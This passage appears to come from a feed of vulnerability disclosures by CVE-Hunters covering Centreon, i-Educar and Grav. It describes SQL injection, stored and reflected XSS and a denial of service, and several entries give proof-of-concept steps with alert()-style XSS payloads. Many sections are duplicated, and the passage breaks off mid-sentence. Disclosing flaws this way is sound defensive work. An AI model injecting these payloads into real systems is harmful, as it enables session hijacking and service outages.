target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12514</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges is able to introduce a SQL Injection using the Open-tickets Notification rules configuration parameters.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p><h2 id="cve-2025-12514-sql-injection">CVE-2025-12514: SQL Injection </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-12514" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-12514</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges is able to introduce a SQL Injection using the Open-tickets Notification rules configuration parameters.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 22 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54890/ https://www.cvehunters.com/p/cve-2025-54890/ <h2 id="cve-2025-54890-cross-site-scripting-xss-stored">CVE-2025-54890: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54890" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54890</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Hostgroups configuration page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p><h2 id="cve-2025-54890-cross-site-scripting-xss-stored">CVE-2025-54890: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54890" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54890</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A user with elevated privileges can inject XSS in the Hostgroups configuration page.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 22 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-8460/ https://www.cvehunters.com/p/cve-2025-8460/ <h2 id="cve-2025-8460-cross-site-scripting-xss-stored">CVE-2025-8460: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8460" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8460</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Notification rules, Open tickets module) allows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p><h2 id="cve-2025-8460-cross-site-scripting-xss-stored">CVE-2025-8460: Cross-Site Scripting (XSS) Stored </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8460" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8460</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Centreon Infra Monitoring (Notification rules, Open tickets module) allows Stored XSS by users with elevated privileges.This issue affects Infra Monitoring: from 24.10.0 before 24.10.5, from 24.04.0 before 24.04.5, from 23.10.0 before 23.10.4.</p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344" target="_blank" rel="noopener" >https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 22 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9638/ https://www.cvehunters.com/p/cve-2025-9638/ <h2 id="cve-2025-9638-cross-site-scripting-xss-stored-in-admin-panel">CVE-2025-9638: Cross-Site Scripting (XSS) Stored in Admin Panel </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9638" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9638</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_usuario_cad.php</code> endpoint of the i-Educar application. The issue arises because the <code>matricula_interna</code> parameter is not sanitized before being stored in the database. Malicious scripts injected into this field persist in the system and are executed whenever the affected record is displayed in the web interface, leading to a persistent client-side compromise.</p><h2 id="cve-2025-9638-cross-site-scripting-xss-stored-in-admin-panel">CVE-2025-9638: Cross-Site Scripting (XSS) Stored in Admin Panel </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9638" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9638</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_usuario_cad.php</code> endpoint of the i-Educar application. The issue arises because the <code>matricula_interna</code> parameter is not sanitized before being stored in the database. Malicious scripts injected into this field persist in the system and are executed whenever the affected record is displayed in the web interface, leading to a persistent client-side compromise.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_usuario_cad.php</code></p> <p>Parameter: <code>matricula_interna</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">><</span><span class="n">svg</span><span class="o">/</span><span class="n">onload</span><span class="o">=</span><span class="n">alert</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> <ul> <li>Log in with an account that can create or edit users.</li> <li>Navigate to Configurações → Permissões → Usuários.</li> <li>Create a new user or edit an existing one.</li> <li>In the Matrícula Interna field, insert the payload.</li> <li>Save changes.</li> </ul> </p> <p><img src="/p/cve-2025-9638/image.png" width="1630" height="851" srcset="/p/cve-2025-9638/image_hu_cc7ec697ae4e70f7.png 480w, /p/cve-2025-9638/image_hu_555dd8de909d4f60.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <p style="text-align: justify;"> <ul> <li>Open the affected user record.</li> <li>The payload executes immediately, confirming the stored XSS.</li> </ul> </p> <p><img src="/p/cve-2025-9638/image-1.png" width="1278" height="689" srcset="/p/cve-2025-9638/image-1_hu_2f16889c8f63d68d.png 480w, /p/cve-2025-9638/image-1_hu_e3a35d5e25fb0aad.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://fluidattacks.com/pt/advisories/travis" target="_blank" rel="noopener" >https://fluidattacks.com/pt/advisories/travis</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 09 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-66305/ https://www.cvehunters.com/p/cve-2025-66305/ <h2 id="cve-2025-66305-denial-of-service-via-improper-input-handling-in-supported-parameter">CVE-2025-66305: Denial of Service via Improper Input Handling in <code>Supported</code> Parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66305" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66305</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Denial of Service (DoS) vulnerability was identified in the <b>"Languages"</b> submenu of the Grav <b>admin configuration panel</b> (<code>/admin/config/system</code>). Specifically, the <code>Supported</code> parameter fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (<code>/</code>) or an XSS test string—it causes a fatal regular expression parsing error on the server.</p><h2 id="cve-2025-66305-denial-of-service-via-improper-input-handling-in-supported-parameter">CVE-2025-66305: Denial of Service via Improper Input Handling in <code>Supported</code> Parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66305" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66305</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Denial of Service (DoS) vulnerability was identified in the <b>"Languages"</b> submenu of the Grav <b>admin configuration panel</b> (<code>/admin/config/system</code>). Specifically, the <code>Supported</code> parameter fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (<code>/</code>) or an XSS test string—it causes a fatal regular expression parsing error on the server.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application dynamically constructs a regular expression using the contents of the <code>Supported</code> field without escaping the input using <code>preg_quote()</code> or proper validation. This allows attackers to inject invalid syntax into the regex engine, crashing the application during language resolution.</p> <h3 id="stack-trace-excerpt">Stack trace excerpt: </h3><p><code>Whoops \ Exception \ ErrorException (E_WARNING) preg_match(): Unknown modifier 'o' /system/src/Grav/Common/Language/Language.php244</code></p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>POST /admin/config/system</code></p> <p>Submenu: <code>Languages</code></p> <p>Parameter: <code>Supported</code></p> <p style="text-align: justify;"> <ul> <li>Log into the Grav Admin Panel.</br> <li>Navigate to: <b>Configuration → System → Languages</b>.</li> <li>Locate the <code>Supported</code> field.</li> <li>Insert a payload (e.g., a single slash <code>/</code>).</li> <li>Click <b>Save</b>.</li> </ul> </p> <p><img src="/p/cve-2025-66305/image.png" width="1897" height="639" srcset="/p/cve-2025-66305/image_hu_c3420762a046330d.png 480w, /p/cve-2025-66305/image_hu_3d12dcd60c603267.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="296" data-flex-basis="712px" /></p> <p style="text-align: justify;"> <ul> <li>Observe: All pages in the application begin throwing a fatal error and become inaccessible.</li> </ul> </p> <p><img src="/p/cve-2025-66305/image-1.png" width="1802" height="998" srcset="/p/cve-2025-66305/image-1_hu_3cf5c52544b0b6fa.png 480w, /p/cve-2025-66305/image-1_hu_379d1b4d6d7e7b50.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="180" data-flex-basis="433px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Application-wide Denial of Service (DoS).</li> <li>All login and admin views crash with the same error.</li> <li>Potentially exploitable by: Admin panel users; CSRF if misconfigured.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-66308/ https://www.cvehunters.com/p/cve-2025-66308/ <h2 id="cve-2025-66308-cross-site-scripting-xss-stored-endpoint-adminconfigsite-parameter-datataxonomies">CVE-2025-66308: Cross-Site Scripting (XSS) Stored endpoint <code>/admin/config/site</code> parameter <code>data[taxonomies]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66308" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66308</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/config/site</code> endpoint of the <i>Grav</i> application. This vulnerability allows attackers to inject malicious scripts into the <code>data[taxonomies]</code> parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.</p><h2 id="cve-2025-66308-cross-site-scripting-xss-stored-endpoint-adminconfigsite-parameter-datataxonomies">CVE-2025-66308: Cross-Site Scripting (XSS) Stored endpoint <code>/admin/config/site</code> parameter <code>data[taxonomies]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66308" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66308</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/config/site</code> endpoint of the <i>Grav</i> application. This vulnerability allows attackers to inject malicious scripts into the <code>data[taxonomies]</code> parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /admin/config/site</code></p> <p>Parameter: <code>data[taxonomies]</code></p> <p style="text-align: justify;">The application does not properly validate or sanitize input in the <code>data[taxonomies]</code> field. As a result, an attacker can inject JavaScript code, which is stored in the site configuration and later rendered in the administrative interface or site output, causing automatic execution in the user's browser.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">"><script>alert('XSS-PoC')</script> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> <ul> <li>Log in to the <i>Grav</i> Admin Panel with sufficient permissions to modify site configuration.</li> <li>Navigate to <b>Configuration > Site</b>.</li> <li>In the <b>Taxonomies Types</b> field (which maps to <code>data[taxonomies]</code>), insert the payload.</li> <li>Save the configuration.</li> </ul> </p> <p><img src="/p/cve-2025-66308/image.png" width="1897" height="628" srcset="/p/cve-2025-66308/image_hu_2db52fe672979960.png 480w, /p/cve-2025-66308/image_hu_3b02d8d0dfaa4c28.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="302" data-flex-basis="724px" /></p> <p style="text-align: justify;"> <ul> <li>Go on Pages and click on one of them.</li> </ul> </p> <p><img src="/p/cve-2025-66308/image-1.png" width="932" height="587" srcset="/p/cve-2025-66308/image-1_hu_31314f0d34cb0fe9.png 480w, /p/cve-2025-66308/image-1_hu_b304d93e6237dbae.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="158" data-flex-basis="381px" /></p> <p style="text-align: justify;"> <ul> <li>The stored payload is executed immediately in the browser, confirming the Stored XSS vulnerability.</li> </ul> </p> <p><img src="/p/cve-2025-66308/image-2.png" width="1204" height="377" srcset="/p/cve-2025-66308/image-2_hu_44fbaf72eed9e907.png 480w, /p/cve-2025-66308/image-2_hu_3e2f9566dc2c6480.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="319" data-flex-basis="766px" /></p> <p style="text-align: justify;"> <ul> <li>The HTTP request submitted during this process contains the vulnerable parameter and payload:</li> </ul> </p> <p><img src="/p/cve-2025-66308/image-3.png" width="757" height="675" srcset="/p/cve-2025-66308/image-3_hu_862cece54be2132a.png 480w, /p/cve-2025-66308/image-3_hu_377bd8a8e99a5dbb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="112" data-flex-basis="269px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-66309/ https://www.cvehunters.com/p/cve-2025-66309/ <h2 id="cve-2025-66309-cross-site-scripting-xss-reflected-endpoint-adminpagespage-parameter-dataheadercontentitems-located-in-the-blog-config-tab">CVE-2025-66309: Cross-Site Scripting (XSS) Reflected endpoint <code>/admin/pages/[page]</code>, parameter <code>data[header][content][items]</code>, located in the “Blog Config” tab </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66309" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66309</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/pages/[page]</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[header][content][items]</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /admin/pages/[page]</code></p> <p>Parameter: <code>data[header][content][items]</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user input in the <code>data[header][content][items]</code> parameter. As a result, attackers can craft a malicious URL with an XSS payload. When this URL is accessed, the injected script is reflected back in the HTTP response and executed within the context of the victim's browser session.</p><h2 id="cve-2025-66309-cross-site-scripting-xss-reflected-endpoint-adminpagespage-parameter-dataheadercontentitems-located-in-the-blog-config-tab">CVE-2025-66309: Cross-Site Scripting (XSS) Reflected endpoint <code>/admin/pages/[page]</code>, parameter <code>data[header][content][items]</code>, located in the “Blog Config” tab </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66309" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66309</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/pages/[page]</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[header][content][items]</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /admin/pages/[page]</code></p> <p>Parameter: <code>data[header][content][items]</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user input in the <code>data[header][content][items]</code> parameter. As a result, attackers can craft a malicious URL with an XSS payload. When this URL is accessed, the injected script is reflected back in the HTTP response and executed within the context of the victim's browser session.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">ImG</span> <span class="na">sRc</span><span class="o">=</span><span class="s">x</span> <span class="na">OnErRoR</span><span class="o">=</span><span class="s">alert('XSS-PoC3')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Log in to the Grav Admin Panel and navigate to <b>Pages</b>.</li> <li>Create a new page or edit an existing one.</li> <li>In the <b>Advanced > Blog Config > Items field</b> (which maps to <code>data[header][content][items]</code>), insert the payload above.</li> </ul> </p> <p><img src="/p/cve-2025-66309/image.png" width="1910" height="510" srcset="/p/cve-2025-66309/image_hu_e1d1fb13d9a9b4e7.png 480w, /p/cve-2025-66309/image_hu_3a3afba466c81fbb.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="374" data-flex-basis="898px" /></p> <p style="text-align: justify;"> <ul> <li>Save the page.</li> <li>The malicious payload is reflected and rendered by the application without proper sanitization. The JavaScript code is immediately executed in the browser.</li> </ul> </p> <p><img src="/p/cve-2025-66309/image-1.png" width="991" height="534" srcset="/p/cve-2025-66309/image-1_hu_a0c6b4602ec1b3c4.png 480w, /p/cve-2025-66309/image-1_hu_db37a16e3222c488.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="445px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq" target="_blank" rel="noopener" >https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 01 Dec 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-66310/ https://www.cvehunters.com/p/cve-2025-66310/ <h2 id="cve-2025-66310-cross-site-scripting-xss-stored-endpoint-adminpagespage-parameter-dataheadertemplate-in-advanced-tab">CVE-2025-66310: Cross-Site Scripting (XSS) Stored endpoint <code>/admin/pages/[page]</code> parameter <code>data[header][template]</code> in Advanced Tab </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66310" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66310</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/pages/[page]</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[header][template]</code> parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.</p><h2 id="cve-2025-66310-cross-site-scripting-xss-stored-endpoint-adminpagespage-parameter-dataheadertemplate-in-advanced-tab">CVE-2025-66310: Cross-Site Scripting (XSS) Stored endpoint <code>/admin/pages/[page]</code> parameter <code>data[header][template]</code> in Advanced Tab </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-66310" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-66310</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/admin/pages/[page]</code> endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the <code>data[header][template]</code> parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /admin/pages/[page]</code></p> <p>Parameter: <code>data[header][template]</code></p> <p style="text-align: justify;">The application fails to properly sanitize user input in the 